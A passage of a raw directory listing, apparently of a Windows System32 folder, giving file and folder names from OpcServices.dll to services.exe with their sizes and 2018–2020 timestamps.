2179584 09/15/2018 07:28:55 OpcServices.dll +F 72704 09/15/2018 07:29:14 openfiles.exe +F 1071616 09/15/2018 07:29:21 opengl32.dll +D 0 09/15/2018 09:08:41 OpenSSH +F 120560 03/07/2020 00:53:47 OpenWith.exe +F 112128 09/15/2018 07:29:20 OptionalFeatures.exe +F 1032544 03/07/2020 00:53:46 ortcengine.dll +F 26624 09/15/2018 07:28:45 osbaseln.dll +F 637952 09/15/2018 07:28:43 osk.exe +F 10240 09/15/2018 07:28:42 OskSupport.dll +F 9728 09/15/2018 07:28:44 osuninst.dll +F 46920 09/15/2018 07:28:22 OutdoorAudioEnvironment.bin +F 219136 03/07/2020 00:54:18 P2P.dll +F 440320 03/07/2020 00:54:18 P2PGraph.dll +F 205824 03/07/2020 00:54:18 p2pnetsh.dll +F 431616 03/07/2020 00:54:17 p2psvc.dll +F 12288 09/15/2018 07:28:46 pacjsworker.exe +F 38912 09/15/2018 07:28:38 PackagedCWALauncher.exe +F 83968 09/15/2018 09:10:00 PackageInspector.exe +F 93184 09/15/2018 07:29:14 packager.dll +F 208896 09/15/2018 07:28:30 PackageStateRoaming.dll +F 14848 09/15/2018 07:28:25 panmap.dll +F 44912 03/07/2020 00:53:53 PasswordOnWakeSettingFlyout.exe +F 19456 09/15/2018 07:29:16 PATHPING.EXE +F 65024 09/15/2018 07:29:14 pautoenr.dll +F 971776 09/15/2018 07:29:13 PayloadRestrictions.dll +F 25600 09/15/2018 07:28:34 PaymentMediatorServiceProxy.dll +F 68096 09/15/2018 07:28:42 pcacli.dll +F 64512 09/15/2018 07:28:42 pcadm.dll +F 12800 09/15/2018 07:28:42 pcaevts.dll +F 50688 09/15/2018 07:28:42 pcalua.exe +F 553784 03/07/2020 00:53:51 pcasvc.dll +F 91648 09/15/2018 07:28:42 pcaui.dll +F 157184 09/15/2018 07:28:43 pcaui.exe +F 15360 09/15/2018 07:28:22 pcbp.rs +F 150 09/15/2018 07:28:55 pcl.sep +F 918888 09/15/2018 07:28:24 PCPKsp.dll +F 29184 09/15/2018 07:28:39 PCShellCommonProxyStub.dll +F 384512 09/15/2018 07:28:29 pcsvDevice.dll +F 15872 09/15/2018 07:29:22 pcwrun.exe +F 27080 09/15/2018 07:28:46 pcwum.dll +F 126464 09/15/2018 07:29:22 pcwutl.dll +F 297984 09/15/2018 07:28:51 pdh.dll +F 56832 09/15/2018 07:29:21 pdhui.dll +F 224768 03/07/2020 00:54:24 PeerDist.dll +F 41472 09/15/2018 09:09:55 PeerDistAD.dll +F 732160 03/07/2020 00:54:24 PeerDistCacheProvider.dll +F 226304 03/07/2020 00:54:24 PeerDistCleaner.dll +F 54784 09/15/2018 09:09:55 PeerDistHttpTrans.dll +F 420864 03/07/2020 00:54:24 PeerDistSh.dll +F 1969152 03/07/2020 00:54:24 PeerDistSvc.dll +F 181248 03/07/2020 00:54:24 PeerDistWSDDiscoProv.dll +F 20992 09/15/2018 07:28:22 pegi-pt.rs +F 20480 09/15/2018 07:28:22 pegi.rs +F 118784 09/15/2018 07:28:34 PeopleAPIs.dll +F 214528 03/07/2020 00:53:48 PeopleBand.dll +F 116224 09/15/2018 07:29:24 PerceptionDriverClient.dll +D 0 09/15/2018 09:07:52 PerceptionSimulation +F 15872 09/15/2018 07:29:14 PerceptionSimulation.ProxyStubs.dll +F 65848 09/15/2018 07:29:24 PerceptionSimulationDevice.exe +F 557056 03/07/2020 00:54:08 PerceptionSimulationExtensions.dll +F 259072 03/07/2020 00:54:08 PerceptionSimulationManager.dll +F 125662 03/30/2020 07:49:39 perfc009.dat +F 47104 09/15/2018 07:28:51 perfctrs.dll +F 33424 09/15/2018 07:31:35 perfd009.dat +F 40960 09/15/2018 07:28:51 perfdisk.dll +F 675552 03/30/2020 07:49:39 perfh009.dat +F 297062 09/15/2018 07:31:35 perfi009.dat +F 176640 09/15/2018 07:29:21 perfmon.exe +F 145519 09/15/2018 07:29:21 perfmon.msc +F 25088 09/15/2018 07:28:51 perfnet.dll +F 40448 09/15/2018 07:28:51 perfos.dll +F 40960 03/07/2020 00:53:57 perfproc.dll +F 795992 03/30/2020 07:49:39 PerfStringBackup.INI +F 84480 09/15/2018 07:29:13 perftrack.dll +F 39936 03/07/2020 00:54:17 perfts.dll +F 90112 03/07/2020 00:53:48 PersonalizationCSP.dll +F 199680 09/15/2018 07:28:57 PersonaX.dll +F 115120 03/07/2020 00:53:53 phoneactivate.exe +F 244224 09/15/2018 07:28:34 PhoneCallHistoryApis.dll +F 420352 03/07/2020 00:53:47 PhoneDataSync.dll +F 437248 03/07/2020 00:53:40 PhoneOm.dll +F 104960 09/15/2018 07:28:39 PhonePlatformAbstraction.dll +F 846848 03/07/2020 00:53:47 PhoneProviders.dll +F 889344 03/07/2020 00:53:47 PhoneService.dll +F 2560 09/15/2018 07:28:39 PhoneServiceRes.dll +F 2259 09/15/2018 07:28:22 PhoneSystemToastIcon.contrast-white.png +F 1969 09/15/2018 07:28:22 PhoneSystemToastIcon.png +F 384000 03/07/2020 00:53:40 Phoneutil.dll +F 2560 09/15/2018 07:28:34 PhoneutilRes.dll +F 487424 03/07/2020 00:53:39 PhotoMetadataHandler.dll +F 570880 09/15/2018 09:10:03 PhotoScreensaver.scr +F 340992 09/15/2018 09:10:04 photowiz.dll +F 121536 03/07/2020 00:53:37 PickerHost.exe +F 370176 09/15/2018 07:28:38 PickerPlatform.dll +F 46080 09/15/2018 07:29:14 pid.dll +F 1056272 03/07/2020 00:53:45 pidgenx.dll +F 35840 09/15/2018 07:28:58 pifmgr.dll +F 188416 09/15/2018 07:28:34 PimIndexMaintenance.dll +F 62464 09/15/2018 07:28:34 PimIndexMaintenanceClient.dll +F 970752 09/15/2018 07:28:34 Pimstore.dll +F 92672 09/15/2018 07:28:24 PinEnrollmentBroker.exe +F 164352 09/15/2018 07:28:24 PinEnrollmentHelper.dll +F 21504 09/15/2018 07:29:16 PING.EXE +F 776272 03/07/2020 00:53:24 pkeyhelper.dll +F 209920 09/15/2018 06:09:27 PkgMgr.exe +F 92672 03/07/2020 00:54:16 PktMon.exe +F 237056 03/07/2020 00:53:46 pku2u.dll +D 0 03/07/2020 00:55:54 pl-PL +F 1473024 09/15/2018 07:29:24 pla.dll +F 10752 09/15/2018 07:29:24 plasrv.exe +F 77824 09/15/2018 07:28:58 playlistfolder.dll +F 89088 09/15/2018 07:28:22 PlaySndSrv.dll +F 392704 09/15/2018 07:29:16 PlayToDevice.dll +F 578560 03/07/2020 00:54:09 PlayToManager.dll +F 161280 09/15/2018 07:29:14 playtomenu.dll +F 292352 09/15/2018 09:10:02 PlayToReceiver.dll +F 37376 09/15/2018 07:29:14 PlayToStatusProvider.dll +F 61456 09/15/2018 07:29:25 ploptin.dll +F 811008 09/15/2018 09:09:57 pmcsnap.dll +F 66560 09/15/2018 07:29:18 pngfilt.dll +F 2118656 03/07/2020 00:53:45 pnidui.dll +F 130048 09/15/2018 07:28:56 pnpclean.dll +F 55296 03/07/2020 00:53:44 pnppolicy.dll +F 15360 09/15/2018 07:29:23 pnpts.dll +F 41984 09/15/2018 07:28:56 pnpui.dll +F 59904 09/15/2018 07:28:55 PnPUnattend.exe +F 267776 09/15/2018 07:28:36 pnputil.exe +F 109568 09/15/2018 07:29:21 PNPXAssoc.dll +F 57344 09/15/2018 07:29:21 PNPXAssocPrx.dll +F 27136 09/15/2018 07:29:24 pnrpauto.dll +F 83456 09/15/2018 07:29:24 Pnrphc.dll +F 86016 09/15/2018 07:29:24 pnrpnsp.dll +F 356352 03/07/2020 00:54:18 pnrpsvc.dll +D 0 09/15/2018 07:33:50 PointOfService +F 542536 03/07/2020 00:53:58 policymanager.dll +F 198656 03/07/2020 00:53:43 policymanagerprecheck.dll +F 332800 09/15/2018 07:28:50 polstore.dll +F 142848 09/15/2018 06:09:30 poqexec.exe +F 632320 09/15/2018 09:10:02 PortableDeviceApi.dll +F 126464 09/15/2018 09:10:02 PortableDeviceClassExtension.dll +F 69120 09/15/2018 09:10:02 PortableDeviceConnectApi.dll +F 438784 09/15/2018 09:09:56 PortableDeviceStatus.dll +F 158208 09/15/2018 07:29:14 PortableDeviceSyncProvider.dll +F 181760 09/15/2018 09:10:02 PortableDeviceTypes.dll +F 153600 09/15/2018 09:09:58 PortableDeviceWiaCompat.dll +F 66560 09/15/2018 07:28:36 POSyncServices.dll +F 36864 09/15/2018 07:28:42 pots.dll +F 220160 09/15/2018 07:29:21 powercfg.cpl +F 96256 09/15/2018 07:28:56 powercfg.exe +F 465920 09/15/2018 07:29:21 powercpl.dll +F 369808 09/15/2018 07:28:45 powrprof.dll +F 265216 09/15/2018 09:09:58 ppcsnap.dll +F 68608 09/15/2018 07:28:50 prauthproviders.dll +F 269824 09/15/2018 07:29:33 PresentationHost.exe +F 65536 09/15/2018 07:29:33 PresentationHostProxy.dll +F 224256 09/15/2018 09:10:00 PresentationSettings.exe +F 29184 09/15/2018 07:28:58 prevhost.exe +F 13824 09/15/2018 07:28:50 prflbmsg.dll +F 16896 09/15/2018 07:29:16 print.exe +F 81408 09/15/2018 07:28:56 Print.Workflow.Source.dll +F 72192 09/15/2018 09:10:03 PrintBrmUi.exe +F 46592 09/15/2018 07:28:25 printfilterpipelineprxy.dll +F 826880 03/07/2020 00:53:33 printfilterpipelinesvc.exe +D 0 09/15/2018 09:07:52 Printing_Admin_Scripts +F 76800 09/15/2018 07:28:25 PrintIsolationHost.exe +F 59392 09/15/2018 07:28:25 PrintIsolationProxy.dll +F 146389 09/15/2018 09:09:57 printmanagement.msc +F 68608 09/15/2018 07:28:55 PrintPlatformConfig.dll +F 727552 09/15/2018 07:28:55 PrintRenderAPIHost.DLL +F 1213440 09/15/2018 07:28:57 printui.dll +F 64000 09/15/2018 07:28:57 printui.exe +F 25600 09/15/2018 07:28:56 PrintWorkflowProxy.dll +F 177152 09/15/2018 07:28:56 PrintWorkflowService.dll +F 157184 03/07/2020 00:54:16 PrintWSDAHost.dll +F 5739008 09/14/2018 18:05:00 prm0009.dll +F 179200 09/15/2018 07:28:56 prncache.dll +F 483840 09/15/2018 07:28:57 prnfldr.dll +F 256512 03/07/2020 00:53:45 prnntfy.dll +F 178176 03/07/2020 00:53:44 prntvpt.dll +F 35840 09/15/2018 07:28:34 ProductEnumerator.dll +F 132480 03/07/2020 00:53:54 profapi.dll +F 163840 03/07/2020 00:53:25 profext.dll +F 142336 09/15/2018 07:28:50 profprov.dll +F 470016 03/07/2020 00:53:26 profsvc.dll +F 154624 09/15/2018 07:28:51 profsvcext.dll +F 1743376 03/07/2020 00:53:25 propsys.dll +F 34304 09/15/2018 07:28:51 proquota.exe +F 799232 09/15/2018 07:28:25 provcore.dll +F 94208 03/07/2020 00:53:33 provdatastore.dll +F 21504 09/15/2018 07:28:24 provdiagnostics.dll +F 378880 03/07/2020 00:53:33 provengine.dll +F 266240 03/07/2020 00:53:33 provhandlers.dll +F 75776 09/15/2018 07:29:25 provisioningcommandscsp.dll +F 229376 03/07/2020 00:53:33 provisioningcsp.dll +F 245248 09/15/2018 07:28:24 ProvisioningHandlers.dll +F 61440 09/15/2018 07:29:25 provlaunch.exe +F 108544 09/15/2018 07:29:25 provmigrate.dll +F 290304 03/07/2020 00:53:33 provops.dll +F 138240 03/07/2020 00:53:32 provpackageapidll.dll +F 185344 09/15/2018 07:29:25 provplatformdesktop.dll +F 91136 09/15/2018 07:28:25 ProvPluginEng.dll +F 468480 03/07/2020 00:54:18 provsvc.dll +F 79360 03/07/2020 00:54:18 ProvSysprep.dll +F 315392 09/15/2018 07:28:26 provthrd.dll +F 84480 03/07/2020 00:53:33 provtool.exe +F 165376 09/15/2018 07:28:30 ProximityCommon.dll +F 16896 09/15/2018 07:28:30 ProximityCommonPal.dll +F 26112 09/15/2018 07:28:30 ProximityRtapiPal.dll +F 304640 09/15/2018 07:28:30 ProximityService.dll +F 76288 03/07/2020 00:53:37 ProximityServicePal.dll +D 0 09/15/2018 07:33:50 ProximityToast +F 259464 09/15/2018 07:29:25 ProximityUxHost.exe +F 21344 09/15/2018 07:28:26 prproc.exe +F 82944 09/15/2018 07:28:29 prvdmofcomp.dll +F 18816 09/15/2018 07:28:42 psapi.dll +F 51 09/15/2018 07:28:55 pscript.sep +F 68920 09/15/2018 07:28:46 PSHED.DLL +F 593920 09/15/2018 07:29:23 psisdecd.dll +F 98816 09/15/2018 07:29:23 psisrndr.ax +F 50176 09/15/2018 07:28:29 PSModuleDiscoveryProvider.dll +F 4148 09/15/2018 07:28:29 psmodulediscoveryprovider.mof +F 663552 03/07/2020 00:53:42 PsmServiceExtHost.dll +F 241664 03/07/2020 00:53:42 psmsrv.dll +F 601600 09/15/2018 07:28:42 psr.exe +F 15360 09/15/2018 07:29:23 pstask.dll +F 16384 09/15/2018 07:28:50 pstorec.dll +D 0 09/15/2018 09:09:27 pt-BR +D 0 09/15/2018 09:09:27 pt-PT +F 224768 03/07/2020 00:53:28 ptpprov.dll +F 201728 09/15/2018 07:28:57 puiapi.dll +F 494080 03/07/2020 00:53:45 puiobj.dll +F 270336 09/15/2018 07:28:34 PushToInstall.dll +F 817152 09/15/2018 09:10:01 pwcreator.exe +F 327680 09/15/2018 07:29:20 pwlauncher.dll +F 35328 09/15/2018 07:29:21 pwlauncher.exe +F 93184 09/15/2018 07:29:46 pwrshplugin.dll +F 31744 09/15/2018 07:29:20 pwsso.dll +F 24576 09/15/2018 09:10:03 qappsrv.exe +F 154112 09/15/2018 07:29:14 qasf.dll +F 195072 09/15/2018 07:29:22 qcap.dll +F 250368 09/15/2018 07:29:22 qdv.dll +F 392192 09/15/2018 07:29:21 qdvd.dll +F 641536 09/15/2018 07:29:23 qedit.dll +F 733696 09/15/2018 07:29:22 qedwipes.dll +F 1388544 03/07/2020 00:53:37 qmgr.dll +F 28160 09/15/2018 09:10:03 qprocess.exe +F 1639424 09/15/2018 07:29:21 quartz.dll +F 107008 09/15/2018 07:28:32 Query.dll +F 16896 09/15/2018 09:10:03 query.exe +F 345600 03/07/2020 00:53:50 QuickActionsDataModel.dll +F 641024 09/15/2018 09:08:26 quickassist.exe +F 547840 03/07/2020 00:53:50 QuietHours.dll +F 25088 09/15/2018 09:10:03 quser.exe +F 296960 09/15/2018 07:28:56 qwave.dll +F 28672 09/15/2018 09:10:03 qwinsta.exe +F 34816 09/15/2018 07:29:21 RacEngn.dll +F 132096 09/15/2018 07:29:47 racpldlg.dll +F 99328 09/15/2018 07:29:23 radardt.dll +F 71168 09/15/2018 07:29:23 radarrs.dll +F 343552 03/07/2020 00:53:53 RADCUI.dll +D 0 09/15/2018 07:33:50 ras +F 16896 09/15/2018 07:28:57 rasadhlp.dll +F 954368 03/07/2020 00:53:45 rasapi32.dll +F 104448 09/15/2018 07:28:57 rasauto.dll +F 17920 09/15/2018 07:28:57 rasautou.exe +F 157696 09/15/2018 07:28:57 raschap.dll +F 281088 09/15/2018 07:28:57 raschapext.dll +F 1820 09/15/2018 07:28:57 rasctrnm.h +F 21504 09/15/2018 07:28:57 rasctrs.dll +F 408064 03/07/2020 00:53:45 rascustom.dll +F 81920 09/15/2018 07:28:57 rasdiag.dll +F 19968 09/15/2018 07:28:56 rasdial.exe +F 950272 03/07/2020 00:53:45 rasdlg.dll +F 134144 09/15/2018 07:29:47 raserver.exe +F 953344 03/07/2020 00:53:45 rasgcw.dll +F 184320 03/07/2020 00:53:45 rasman.dll +F 927232 03/07/2020 00:53:45 rasmans.dll +F 61952 09/15/2018 07:28:56 rasmbmgr.dll +F 333824 03/07/2020 00:53:43 RasMediaManager.dll +F 1667072 09/15/2018 07:28:57 RASMM.dll +F 354304 09/15/2018 07:28:57 rasmontr.dll +F 35328 03/07/2020 00:53:45 rasphone.exe +F 489472 09/15/2018 07:28:57 rasplap.dll +F 305664 03/07/2020 00:53:45 rasppp.dll +F 254976 03/07/2020 00:53:45 rastapi.dll +F 521728 03/07/2020 00:53:28 rastls.dll +F 375808 09/15/2018 07:28:57 rastlsext.dll +D 0 09/15/2018 07:33:50 RasToast +F 685568 03/07/2020 00:54:18 rdbui.dll +F 1478968 03/07/2020 00:53:42 rdpbase.dll +F 11264 09/15/2018 07:29:22 rdpcfgex.dll +F 430592 03/07/2020 00:54:16 rdpclip.exe +F 1260032 03/07/2020 00:53:42 rdpcore.dll +F 1677312 03/07/2020 00:53:21 rdpcorets.dll +F 417280 03/07/2020 00:53:42 rdpencom.dll +F 304880 09/15/2018 07:29:22 rdpendp.dll +F 363520 03/07/2020 00:54:27 rdpinit.exe +F 182272 09/15/2018 07:29:22 rdpinput.exe +F 2031104 03/07/2020 00:53:21 rdpnano.dll +F 228352 09/15/2018 07:29:25 RdpRelayTransport.dll +F 43520 09/15/2018 07:29:23 RdpSa.exe +F 28160 09/15/2018 07:29:22 RdpSaProxy.exe +F 15360 09/15/2018 07:29:23 RdpSaPs.dll +F 30720 09/15/2018 07:29:23 RdpSaUacHelper.exe +F 1830712 03/07/2020 00:53:42 rdpserverbase.dll +F 464384 03/07/2020 00:54:27 rdpshell.exe +F 87552 09/15/2018 09:09:56 rdpsign.exe +F 95544 03/07/2020 00:53:21 rdpudd.dll +F 46592 09/15/2018 07:28:46 rdrleakdiag.exe +F 83968 09/15/2018 07:29:23 RDSAppXHelper.dll +F 180224 03/07/2020 00:54:16 rdsdwmdr.dll +F 59904 03/07/2020 00:54:17 RDSPnf.exe +F 109056 09/15/2018 09:10:05 RDVGHelper.exe +F 80896 09/15/2018 07:29:22 rdvvmtransport.dll +F 658944 03/07/2020 00:54:08 RDXService.dll +F 411136 03/07/2020 00:54:18 RDXTaskFactory.dll +F 1087800 03/07/2020 00:53:35 ReAgent.dll +F 40960 09/15/2018 07:28:29 ReAgentc.exe +F 13824 09/15/2018 07:28:29 ReAgentTask.dll +F 194048 03/07/2020 00:54:18 recdisc.exe +F 13824 09/15/2018 07:29:13 recover.exe +D 0 03/29/2020 09:17:13 Recovery +F 90624 09/15/2018 07:29:22 recovery.dll +F 910336 09/15/2018 07:29:22 RecoveryDrive.exe +F 1012224 03/07/2020 00:53:51 refsutil.exe +F 74240 09/15/2018 07:29:14 reg.exe +F 105984 03/07/2020 00:53:53 regapi.dll +F 51200 09/15/2018 07:28:59 RegCtrl.dll +F 11776 09/15/2018 07:29:21 regedt32.exe +F 15872 09/15/2018 07:29:21 regidle.dll +F 46592 09/15/2018 07:29:21 regini.exe +F 24576 09/15/2018 07:28:26 Register-CimProvider.exe +F 159232 09/15/2018 07:29:16 regsvc.dll +F 24064 09/15/2018 07:29:22 regsvr32.exe +F 35112 09/15/2018 07:28:34 reguwpapi.dll +F 185344 09/15/2018 07:28:29 ReInfo.dll +F 121856 09/15/2018 07:28:50 rekeywiz.exe +F 53760 09/15/2018 07:29:20 relog.exe +F 160256 09/15/2018 07:28:29 RelPost.exe +F 94208 03/07/2020 00:53:29 RemoteAppLifetimeManager.exe +F 14336 09/15/2018 09:09:56 RemoteAppLifetimeManagerProxyStub.dll +F 88352 09/15/2018 07:28:20 remoteaudioendpoint.dll +F 208384 09/15/2018 07:29:22 remotepg.dll +F 12800 09/15/2018 07:28:36 RemotePosWorker.exe +F 104960 09/15/2018 07:29:22 remotesp.tsp +F 1613 09/15/2018 07:28:22 RemoteSystemToastIcon.contrast-white.png +F 1124 09/15/2018 07:28:22 RemoteSystemToastIcon.png +F 43008 09/15/2018 07:29:21 RemoteWipeCSP.dll +F 66560 03/07/2020 00:53:33 RemovableMediaProvisioningPlugin.dll +F 70656 09/15/2018 07:29:14 RemoveDeviceContextHandler.dll +F 14336 09/15/2018 07:29:14 RemoveDeviceElevated.dll +F 6656 09/15/2018 07:29:47 rendezvousSession.tlb +F 128000 09/15/2018 09:10:00 repair-bde.exe +F 21504 09/15/2018 07:29:16 replace.exe +F 120320 09/15/2018 07:29:14 ReportingCSP.dll +F 249112 09/15/2018 09:10:04 RESAMPLEDMO.DLL +F 17408 09/15/2018 09:10:03 reset.exe +F 1224704 03/07/2020 00:54:16 reseteng.dll +F 2298880 03/07/2020 00:54:16 ResetEngine.dll +F 11264 09/15/2018 07:29:22 ResetEngine.exe +F 241152 03/07/2020 00:54:16 ResetEngOnline.dll +F 110592 09/15/2018 07:29:21 resmon.exe +F 489984 03/07/2020 00:54:08 ResourceMapper.dll +F 71280 09/15/2018 07:28:30 ResourcePolicyClient.dll +F 144896 09/15/2018 07:28:30 ResourcePolicyServer.dll +F 9312 09/15/2018 07:29:25 ResPriHMImageList +F 9312 09/15/2018 07:29:25 ResPriHMImageListLowCost +F 8735 09/15/2018 07:29:25 ResPriImageList +F 8735 09/15/2018 07:29:25 ResPriImageListLowCost +F 714 09/15/2018 07:28:57 RestartManager.mof +F 176 09/15/2018 07:28:57 RestartManagerUninstall.mof +F 759 09/15/2018 07:28:39 RestartNowPower_80.contrast-black.png +F 785 09/15/2018 07:28:39 RestartNowPower_80.contrast-white.png +F 759 09/15/2018 07:28:39 RestartNowPower_80.png +F 1091 03/07/2020 00:53:29 RestartTonight_80.png +F 1091 03/07/2020 00:53:29 RestartTonight_80_contrast-black.png +F 1003 03/07/2020 00:53:29 RestartTonight_80_contrast-white.png +D 0 09/15/2018 07:33:50 restore +F 622080 03/07/2020 00:54:08 resutils.dll +F 40960 03/07/2020 00:54:27 rfxvmt.dll +F 179712 09/15/2018 07:28:50 rgb9rast.dll +F 151552 09/15/2018 07:29:22 Ribbons.scr +F 607744 09/15/2018 07:28:57 riched20.dll +F 10240 09/15/2018 07:28:57 riched32.dll +F 62976 09/15/2018 07:28:25 rilproxy.dll +F 119296 03/07/2020 00:53:32 RjvMDMConfig.dll +F 574976 09/15/2018 07:28:25 RMActivate.exe +F 604160 09/15/2018 07:28:25 RMActivate_isv.exe +F 500224 09/15/2018 07:28:25 RMActivate_ssp.exe +F 500224 09/15/2018 07:28:25 RMActivate_ssp_isv.exe +F 156160 03/07/2020 00:53:45 RMapi.dll +F 152080 03/07/2020 00:53:42 rmclient.dll +F 17920 09/15/2018 07:28:57 RmClient.exe +F 102912 09/15/2018 07:28:30 RMSRoamingSecurity.dll +F 134656 09/15/2018 07:28:58 rmttpmvscmgrsvr.exe +F 2560 09/15/2018 07:29:20 rnr20.dll +D 0 09/15/2018 09:09:27 ro-RO +F 48128 09/15/2018 07:28:30 RoamingSecurity.dll +F 134656 09/15/2018 07:29:14 Robocopy.exe +F 234440 09/15/2018 07:28:30 rometadata.dll +F 49152 09/15/2018 07:29:21 RotMgr.dll +F 24576 09/15/2018 07:29:14 ROUTE.EXE +F 80384 09/15/2018 07:28:45 RpcEpMap.dll +F 198656 09/15/2018 07:28:42 rpchttp.dll +F 10240 09/15/2018 07:28:42 RpcNs4.dll +F 32768 09/15/2018 07:28:43 rpcnsh.dll +F 30720 03/07/2020 00:53:51 RpcPing.exe +F 1180248 03/07/2020 00:53:54 rpcrt4.dll +F 62696 09/15/2018 07:28:36 RpcRtRemote.dll +F 1205248 03/07/2020 00:53:26 rpcss.dll +F 47616 09/15/2018 09:10:03 rrinstaller.exe +F 202440 09/15/2018 07:28:45 rsaenh.dll +F 133120 09/15/2018 07:29:14 rshx32.dll +F 43566 09/15/2018 09:10:05 rsop.msc +F 223744 03/07/2020 00:53:45 RstrtMgr.dll +F 269312 03/07/2020 00:54:18 rstrui.exe +F 47104 09/15/2018 07:28:57 rtffilt.dll +F 179712 09/15/2018 07:28:57 rtm.dll +F 1091936 03/07/2020 00:53:46 rtmcodecs.dll +F 485376 09/15/2018 07:28:30 RTMediaFrame.dll +F 56672 03/07/2020 00:53:46 rtmmvrortc.dll +F 1354080 03/07/2020 00:53:46 rtmpal.dll +F 4898144 03/07/2020 00:53:46 rtmpltfm.dll +F 66048 03/07/2020 00:53:45 rtutils.dll +F 169384 09/15/2018 07:28:22 RTWorkQ.dll +D 0 09/15/2018 09:09:27 ru-RU +F 96256 03/07/2020 00:53:31 RuleBasedDS.dll +F 19968 09/15/2018 07:29:23 runas.exe +F 71168 09/15/2018 07:28:57 rundll32.exe +F 57856 09/15/2018 07:28:46 runexehelper.exe +F 73216 09/15/2018 07:28:25 RunLegacyCPLElevated.exe +F 59392 09/15/2018 07:28:50 runonce.exe +F 99896 03/07/2020 00:53:37 RuntimeBroker.exe +F 23040 09/15/2018 09:10:03 rwinsta.exe +F 78848 09/15/2018 07:28:45 samcli.dll +F 122368 09/15/2018 07:28:46 samlib.dll +F 932864 03/07/2020 00:53:26 samsrv.dll +F 14848 09/15/2018 07:28:45 sas.dll +F 953344 09/15/2018 07:29:22 sbe.dll +F 195584 09/15/2018 07:29:22 sbeio.dll +F 66048 09/15/2018 07:29:23 sberes.dll +F 22528 09/15/2018 07:28:34 sbservicetrigger.dll +F 69632 09/15/2018 07:29:14 sc.exe +F 287744 09/15/2018 07:29:18 scansetting.dll +F 49152 09/15/2018 07:28:59 SCardBi.dll +F 81408 09/15/2018 07:28:59 SCardDlg.dll +F 262656 09/15/2018 07:28:59 SCardSvr.dll +F 10429 09/15/2018 07:29:46 ScavengeSpace.xml +F 69120 09/15/2018 07:29:46 scavengeui.dll +F 200192 09/15/2018 07:28:59 ScDeviceEnum.dll +F 279040 09/15/2018 07:28:56 scecli.dll +F 515584 09/15/2018 07:28:57 scesrv.dll +F 518144 03/07/2020 00:53:26 schannel.dll +F 25600 09/15/2018 07:28:46 schedcli.dll +F 872448 03/07/2020 00:53:52 schedsvc.dll +F 538 09/15/2018 07:28:39 ScheduleTime_80.contrast-black.png +F 551 09/15/2018 07:28:39 ScheduleTime_80.contrast-white.png +F 538 09/15/2018 07:28:39 ScheduleTime_80.png +F 222720 09/15/2018 07:28:44 schtasks.exe +F 262144 09/15/2018 07:28:59 scksp.dll +F 87040 09/15/2018 07:29:19 scripto.dll +F 22032 09/15/2018 09:10:04 ScriptRunner.exe +F 37888 09/15/2018 07:28:25 scrnsave.scr +F 226304 09/15/2018 07:28:57 scrobj.dll +F 544256 09/15/2018 09:10:00 scrptadm.dll +F 195072 03/07/2020 00:53:45 scrrun.dll +F 24064 09/15/2018 07:28:42 sdbinst.exe +F 49664 09/15/2018 07:29:47 sdchange.exe +F 1219584 03/07/2020 00:54:08 sdclt.exe +F 751616 09/15/2018 07:29:13 sdcpl.dll +F 424960 03/07/2020 00:53:28 SDDS.dll +F 1193984 03/07/2020 00:54:08 sdengin2.dll +F 36200 09/15/2018 07:29:13 SDFHost.dll +F 36352 09/15/2018 07:28:50 sdhcinst.dll +F 211968 09/15/2018 07:29:23 sdiageng.dll +F 25600 09/15/2018 07:29:23 sdiagnhost.exe +F 169472 09/15/2018 07:29:22 sdiagprv.dll +F 52224 09/15/2018 07:29:22 sdiagschd.dll +F 541184 09/15/2018 07:29:18 sdohlp.dll +F 149504 03/07/2020 00:54:08 sdrsvc.dll +F 125440 09/15/2018 07:29:13 sdshext.dll +F 410624 03/07/2020 00:53:39 Search.ProtocolHandler.MAPI2.dll +F 256512 03/07/2020 00:53:39 SearchFilterHost.exe +F 395776 03/07/2020 00:53:45 SearchFolder.dll +F 1051648 03/07/2020 00:53:39 SearchIndexer.exe +F 415744 03/07/2020 00:53:39 SearchProtocolHost.exe +F 59904 09/15/2018 07:28:30 SebBackgroundManagerPolicy.dll +F 1267216 03/07/2020 00:54:25 SecConfig.efi +F 39936 09/15/2018 07:28:56 SecEdit.exe +F 641696 03/07/2020 00:53:54 sechost.dll +F 10752 09/15/2018 07:28:50 secinit.exe +F 31232 09/15/2018 07:28:56 seclogon.dll +F 120458 09/15/2018 09:10:00 secpol.msc +F 400384 09/15/2018 07:28:25 secproc.dll +F 398848 09/15/2018 07:28:25 secproc_isv.dll +F 112640 09/15/2018 07:28:25 secproc_ssp.dll +F 112640 09/15/2018 07:28:25 secproc_ssp_isv.dll +F 27648 09/15/2018 07:28:56 secur32.dll +F 33792 03/07/2020 00:54:08 SecureBioSysprep.dll +D 0 09/15/2018 07:34:01 SecureBootUpdates +F 652304 03/07/2020 00:53:28 securekernel.exe +F 202752 03/07/2020 00:53:28 SecureTimeAggregator.dll +F 5120 09/15/2018 07:28:56 security.dll +F 5783 09/15/2018 07:28:51 SecurityAndMaintenance.png +F 2613 09/15/2018 07:28:51 SecurityAndMaintenance_Alert.png +F 6873 09/15/2018 07:28:51 SecurityAndMaintenance_Error.png +F 195224 03/07/2020 00:54:18 SecurityCenterBroker.dll +F 41560 09/15/2018 07:29:25 SecurityCenterBrokerPS.dll +F 304952 03/07/2020 00:53:36 SecurityHealthAgent.dll +F 106296 03/07/2020 00:53:36 SecurityHealthProxyStub.dll +F 903368 03/07/2020 00:53:36 SecurityHealthService.exe +F 930816 03/07/2020 00:53:47 SecurityHealthSSO.dll +F 83968 09/15/2018 07:28:39 SecurityHealthSystray.exe +F 41472 09/15/2018 07:28:32 SEMgrPS.dll +F 1247232 09/15/2018 07:28:34 SEMgrSvc.dll +F 110592 09/15/2018 07:28:34 SEMgrSvcPAL.dll +F 138752 09/15/2018 07:29:19 sendmail.dll +F 73728 09/15/2018 07:28:57 Sens.dll +F 14336 09/15/2018 07:28:57 SensApi.dll +F 1269248 09/15/2018 07:28:58 SensorDataService.exe +F 27648 09/15/2018 07:28:53 SensorPerformanceEvents.dll +F 398848 03/07/2020 00:53:43 SensorsApi.dll +F 140800 09/15/2018 07:28:53 SensorsClassExtension.dll +F 1311744 09/15/2018 07:28:53 SensorsCpl.dll +F 433152 03/07/2020 00:53:42 SensorService.dll +F 67144 09/15/2018 07:28:38 SensorsNativeApi.dll +F 139952 09/15/2018 07:28:38 SensorsNativeApi.V2.dll +F 116696 09/15/2018 07:28:38 SensorsUtilsV2.dll +F 148992 03/07/2020 00:53:43 sensrsvc.dll +F 18944 09/15/2018 07:29:23 serialui.dll +F 678376 03/07/2020 00:53:45 services.exe +F 92746 09/15/2018 07:29:22 